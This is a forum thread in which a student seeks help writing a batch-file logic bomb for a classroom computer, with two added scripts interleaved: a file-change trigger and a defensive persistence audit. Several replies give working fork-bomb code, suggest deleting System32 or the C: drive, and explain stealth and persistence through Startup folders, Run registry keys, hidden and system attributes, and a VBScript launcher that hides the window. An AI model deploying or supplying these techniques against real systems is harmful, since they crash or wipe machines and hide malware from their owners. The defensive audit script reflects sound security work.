Let's talk Logic Bombs


Post by TheKrimlin on Thu Nov 28, 2013 4:12 am

Just a little background on me, I've been into computers for many years tinkering and toying around with them as a kid, got more serious with them getting into gaming and modding games, started programming (python, C++, etc). I've worked as a network admin, and now I'm stuck back in college so I can score a degree and get a good paying job making bank.

Now to the point, I have basic knowledge and usage of windows batch files for basic admin stuff to make my job easy. My instructor in my intro to info sec class told us that batch files don't have the flexibility of other scripts when it comes to viruses, furthermore said that batch files can never be logic bombs.

My mission is to create a kickass virus in batch file format and drop it on our demo computer to get my point across. Now I've got 2 weeks to do this and I want to get it done so I can shoot for honors credit for the course.

My idea is to write a batch file that takes data like log files (or some other kind of computer generated reports that build up rather quick) store these in a place to overload the ram causing a crash. The kicker is I want it to also take the crash dump files and store them back on ram after recovery to keep the process in a constant crash loop.

My questions are:
Is this even possible?
What kinda delivery methods are available for batch files?
How to get them in there stealthy and where to store them?
How to make a batch file auto exec at a certain point?

Computer is an old Dell Optiplex 755 on Windows XP


Re: Let's talk Logic Bombs

Post by centip3de on Thu Nov 28, 2013 5:52 pm

TheKrimlin wrote:Now to the point, I have basic knowledge and usage of windows batch files for basic admin stuff to make my job easy.


Wait, so, you guys don't use Linux? That's odd. Most servers run Linux and beyond that, most information security classes use Linux. Although I suppose it's possible to use Windows for both, it's just fairly rare.

TheKrimlin wrote:My instructor in my intro to info sec class told us that batch files don't have the flexibility of other scripts when it comes to viruses


Eh? Batch is a pretty shitty language, it's just odd to hear them compared in terms of virii making.

TheKrimlin wrote:furthermore ... that batch files can never be logic bombs.


Once again, eh? If you're defining a logic bomb by the Wikipedia definition, then your professor would be right, unless of course you're making software out in Batch (then you'd have to define what 'software' is, and it gets all kinds of meta).

TheKrimlin wrote:My mission is to create a kickass virus in batch file format and drop it on our demo computer to get my point across. Now I've got 2 weeks to do this and I want to get it done so I can shoot for honors credit for the course.


Something tells me that you won't be getting more credit for destroying a computer...

TheKrimlin wrote:My idea is to write a batch file that takes data like log files (or some other kind of computer generated reports that build up rather quick) store these in a place to overload the ram causing a crash. The kicker is I want it to also take the crash dump files and store them back on ram after recovery to keep the process in a constant crash loop.


Uh, why not just write a fork bomb that puts itself in the startup folder? Seems much simpler. If you still want to keep the fork bomb aspect of it (i.e. it goes off when someone launches a program/deletes a file, etc.), then why not just monitor a certain file and then launch the fork bomb if it changes?

TheKrimlin wrote:My questions are:
Is this even possible?


Well seeing as batch is turing complete, technically anything is possible... but practically, yes, it should be.

TheKrimlin wrote:What kinda delivery methods are available for batch files?


What kind of delivery methods are available? Do you mean, how to get a batch file onto a system? In theory, it's the same way you'd get any other virii onto a person's computer, with the added benefit that an AV most likely won't pick you up.

TheKrimlin wrote:How to get them in there stealthy and where to store them?


If you have physical access, why not just a USB? As to where to store them, you could always just make a massive folder tree, or just store it in a usually inconspicuous place like in the files for a random program.

TheKrimlin wrote:How to make a batch file auto exec at a certain point?


Depends on what you want to do. If you just want to check for changes in/on something, you can set up a simple conditional in the batch file and then put it in the task scheduler to run every 30 seconds or so.
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
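Here is what centip3de's "simple conditional on a timer" suggestion looks like in practice: a batch script that fingerprints one file, compares it with the fingerprint saved on its previous run, and fires a payload only when they differ. This is an added example and not code from the thread; the WATCHED and STATE paths and the harmless echo payload are assumptions. One caveat on the timer: schtasks cannot tick every 30 seconds, its shortest repeat is /SC MINUTE /MO 1, so something like `schtasks /create /sc minute /mo 1 /tn watchdemo /tr "C:\demo\watch.bat"` (task name and path assumed) is the closest fit, and a true 30-second cadence would need a sleep loop inside the script instead.

```batch
@echo off
rem Added example, not code from the thread: a batch "logic bomb" whose trigger
rem is a change to a watched file, meant to be run repeatedly from Task Scheduler.
rem Assumed names: WATCHED (the monitored file) and STATE (where the last-seen
rem size+timestamp is kept between runs). The payload is a harmless echo.
setlocal EnableDelayedExpansion

set "WATCHED=C:\demo\watched.txt"
set "STATE=%TEMP%\watched.state"

if not exist "%WATCHED%" (
    echo [%DATE% %TIME%] %WATCHED% not found, nothing to do
    goto :eof
)

rem Fingerprint = size in bytes + last-modified timestamp. A stock XP box has
rem no hashing tool, so this is the cheapest change detector batch offers.
for %%F in ("%WATCHED%") do set "CUR=%%~zF %%~tF"

rem First run: record a baseline and exit without firing.
if not exist "%STATE%" (
    >"%STATE%" echo !CUR!
    echo [%DATE% %TIME%] baseline recorded: !CUR!
    goto :eof
)
set /p LAST=<"%STATE%"

if "!CUR!"=="!LAST!" (
    echo [%DATE% %TIME%] no change
    goto :eof
)

rem Trigger condition met. Update the baseline before firing so the payload
rem runs once per change rather than on every scheduled tick afterwards.
>"%STATE%" echo !CUR!
call :payload
goto :eof

:payload
rem Stand-in for the real action; the trigger logic above is the point.
echo [%DATE% %TIME%] TRIGGERED: %WATCHED% changed (was "!LAST!", now "!CUR!")
exit /b 0
```

Size plus timestamp misses an edit that preserves both (touching a file back to its old mtime after an in-place same-length change), which is the limit of what cmd can do without an external hashing tool. Every scheduled run also leaves a console window and a state file in %TEMP%, which is exactly the kind of artifact a defender hunting for a timed trigger looks for.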


Re: Let's talk Logic Bombs

Post by Goatboy on Thu Nov 28, 2013 8:37 pm

In addition to what centip3de said (99% of which I agree with), it seems like you're biting off more than you can chew. You've got some misused terminology going on and I think the cause of that is some serious misunderstanding. RAM doesn't really get expended by having a lot of files on the disk; you'd have to open them all at once and that's about as inelegant as it gets. You are also not only not going to get points for this, but if your school is like many of the others you will get in trouble. Even if it is a demo computer.

My suggestion? Read some papers about actual virii in C and ASM. Batch is simply not the tool for the job here.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk


Re: Let's talk Logic Bombs

Post by TheKrimlin on Thu Nov 28, 2013 11:36 pm

centip3de wrote:Wait, so, you guys don't use Linux? That's odd. Most servers run Linux and beyond that, most information security classes use Linux. Although I suppose it's possible to use Windows for both, it's just fairly rare.

At my former workplace it was the fantastic Windows Server 2008 R2... I was super excited to have that there /sarcasm...
centip3de wrote:Eh? Batch is a pretty shitty language, it's just odd to hear them compared in terms of virii making.

I asked the question, I have an odd fascination with batch, dunno why, but it's like a foot fetish, no one likes feet but there's always that one guy lol
centip3de wrote:Once again, eh? If you're defining a logic bomb by the Wikipedia definition, then your professor would be right, unless of course your making software out in Batch (then you'd have to define what 'software' is, and it gets all kinds of meta).

That sounds like an over complication that I'd rather not dive into because I don't have the time, thanks for clearing that up!
centip3de wrote:Something tells me that you won't be getting more credit for destroying a computer...

We have a computer in the class room that is dedicated for this purpose. I've already confirmed that if I do it I'd get that cute little "H" next to the course GPA. I'm also working in the IT department at the college part time, so whenever this computer gets bombed we ghost in and re-image it.
centip3de wrote:Uh, why not just write a fork bomb that puts itself in the startup folder? Seems much simpler. If you still want to keep the fork bomb aspect of it (i.e. it goes off when someone launches a program/deletes a file, etc.), then why not just monitor a certain file and then launch the fork bomb if it changes?

I like that idea, since this is fresh on my mind I never considered a fork bomb, I'll throw you in as a creditor for the idea lol "that guy centip3de from HTS"
centip3de wrote:Well seeing as batch is turing complete, technically anything is possible... but practically, yes, it should be.

Fantastic
centip3de wrote:What kind of delivery methods are available? Do you mean, how to get a batch file onto a system? In theory, it's the same way you'd get any other virii onto a persons computer, with the added benefit that an AV most likely won't pick you up.

I'm not "virii" savvy, I know the functions and how they are delivered, but do not know the inner workings, which I'm trying to learn.
centip3de wrote:If you have physical access, why not just a USB? As to where to store them, you could always just make a massive folder tree, or just store it in a usually inconspicuous place like in the files for a random program.

I do have physical access but I wanted to be semi creative. In our class room we have a local network where all the computers are connected (minus the instructor's lol). USB would be one way, but that would still require logging into the computer. While I do have BT5 and HBCD on USB I was thinking of doing something over the network.
centip3de wrote:Depends on what you want to do. If you just want to check for changes in/on something, you can setup a simple conditional in the batch file and then put it in the task scheduler to run every 30 seconds or so.

I was thinking the same but didn't know if there was something I was missing.

Goatboy wrote:In addition to what centip3de said (99% of which I agree with), it seems like you're biting off more than you can chew. You've got some misused terminology going on and I think the cause of that is some serious misunderstanding. RAM doesn't really get expended by having a lot of files on the disk; you'd have to open them all at once and that's about as inelegant as it gets. You are also not only not going to get points for this, but if your school is like many of the others you will get in trouble. Even if it is a demo computer.

My suggestion? Read some papers about actual virii in C and ASM. Batch is simply not the tool for the job here.

Misused terms, I would probably agree, my teaching has been passed down information from people and manuals, which is why I'm in school lol.

I guess I should expound more on this "demo computer". It's a computer we have in the classroom that's there for the sole purpose of demonstrating the effects of virii and other security threats, also to show what it looks like when someone has "illegally" gained access and to show us what to look for (log files, traffic, etc), and for students to pen test on and infect. This is no virii writing class but it is an intro to information security class.



Much appreciated guys!


Re: Let's talk Logic Bombs

Post by Goatboy on Fri Nov 29, 2013 2:22 am

I like this guy. He gets the Goat Seal of Approval. Welcome him with open ports arms.


Re: Let's talk Logic Bombs

Post by TheKrimlin on Fri Nov 29, 2013 2:56 am

I'm down for ummm open ports :twisted: females only though :mrgreen:

Glad to make a good first impression, I like this site, lots of good info, good people too (with the typical douchebaggery thrown in for spice) but nonetheless good!

I'm sure you'll be hearing more outlandish ideas from me in the future, when my teachers in elementary school told me to think outside the box I took it too far (i.e. wanting to write a logic bomb in batch lol)


Re: Let's talk Logic Bombs

Post by WallShadow on Fri Nov 29, 2013 3:12 pm

Back in high school I wasted every boring lecture I could on toying around with batch stuff, and especially various malicious usages of those.

Here are a few tips on how to go about a batch logic bomb:

As cent stated, a fork bomb really is the simplest method with something like this (assuming the batch file is called 'mystupidbatchfile.bat'):
Code:
:start
rem "start" launches the copy in its own cmd.exe and returns immediately, so
rem the loop keeps spawning copies concurrently; a bare "cmd /k" here would
rem block on the child and only nest one process at a time
start "" cmd /k mystupidbatchfile.bat
goto start

That will kill the system by simply overusing resources, but everything will be back to normal.

Although a truly destructive batch file would need to do something like deleting System32 or, better yet, the entire C:/ drive.

Also as stated previously, you might want to have it auto start on boot by placing the script (or a preliminary launching script) into the Startup folder (note there are several, not just 1) or use reg to add the batch to the run path.

If you add a method of automatic start up, you may also want to make the batch file invisible with ATTRIB +HS mystupidbatchfile.bat

Timing stuff is pretty easy with the use of DATE and TIME and some careful variables.

Another thing that you may want to do is to hide the window that pops up when a batch script is running. This can be done with any specially built program that could launch it, but I find it simpler to use Visual Basic by building a simple .vbs file which launches the batch file, and then running the .vbs file via vscript (or it may be wscript, I forget). This will make it so that the batch file is launched without a command window which the user could kill.

But note that batch is a TERRIBLE language for anything even slightly complicated, so if you're going to be spending any more than an hour developing this stuff, I recommend switching to some other language like C.

if there is anything else you wanna know, just ask. <3
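The defender's side of WallShadow's list, as an added example that is not part of the original post: a batch audit that walks the same four hiding places he names (the per-user and All Users Startup folders, the Run/RunOnce keys, files marked hidden+system with ATTRIB +HS, scheduled tasks) and counts live cmd.exe instances so a running fork bomb stands out. It assumes the Windows XP folder layout (on Vista and later the Startup folders are under %APPDATA%\Microsoft\Windows\Start Menu and %ProgramData%) and a cmd prompt that can read HKLM. Because a batch launched through a .vbs shows up under the Run key as wscript/cscript or the .vbs itself rather than as a .bat, the key and task checks match those names too.

```batch
@echo off
rem Added example, not code from the thread: a defensive audit for the batch
rem persistence and hiding tricks listed above (Startup folders, Run keys,
rem ATTRIB +HS, scheduled tasks, a .vbs/wscript launcher). Paths follow the
rem Windows XP layout; adjust the Startup folder paths for Vista and later.
setlocal EnableDelayedExpansion

echo === Startup folders (current user and All Users) ===
for %%D in ("%USERPROFILE%\Start Menu\Programs\Startup" "%ALLUSERSPROFILE%\Start Menu\Programs\Startup") do (
    if exist "%%~D" (
        echo --- %%~D
        rem /a lists hidden and system entries too, which a plain dir skips
        dir /a /b "%%~D" 2>nul
    )
)

echo === Run / RunOnce keys pointing at scripts or script hosts ===
for %%K in ("HKCU\Software\Microsoft\Windows\CurrentVersion\Run" "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce") do (
    echo --- %%~K
    rem a batch launched via a .vbs appears here as wscript/cscript or .vbs, not .bat
    reg query "%%~K" 2>nul | findstr /i /l /c:".bat" /c:".cmd" /c:".vbs" /c:".js" /c:"wscript" /c:"cscript"
)

echo === Scripts flagged hidden+system (ATTRIB +HS) under %SystemDrive% ===
rem /a:hs matches only entries carrying BOTH attributes; a full-drive walk is slow
dir /s /b /a:hs "%SystemDrive%\*.bat" "%SystemDrive%\*.cmd" "%SystemDrive%\*.vbs" 2>nul

echo === Scheduled tasks whose action is a script ===
schtasks /query /fo LIST /v 2>nul | findstr /i /l /c:"Task To Run:" | findstr /i /l /c:".bat" /c:".cmd" /c:".vbs" /c:"wscript" /c:"cscript"

echo === Live cmd.exe count (a running fork bomb is obvious here) ===
set "N=0"
for /f %%P in ('tasklist /fi "imagename eq cmd.exe" /nh 2^>nul ^| find /c "cmd.exe"') do set "N=%%P"
echo cmd.exe instances: !N!
endlocal
```

The audit is only as good as the places it looks: a trigger spliced into an existing logon script, a task whose action is a renamed copy of cmd.exe, or a launcher that is not a .bat/.vbs at all will pass every check here. Treat a hit in any section as a lead to inspect by hand, and run the script before the machine is re-imaged so the persistence location is recorded alongside the symptom.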


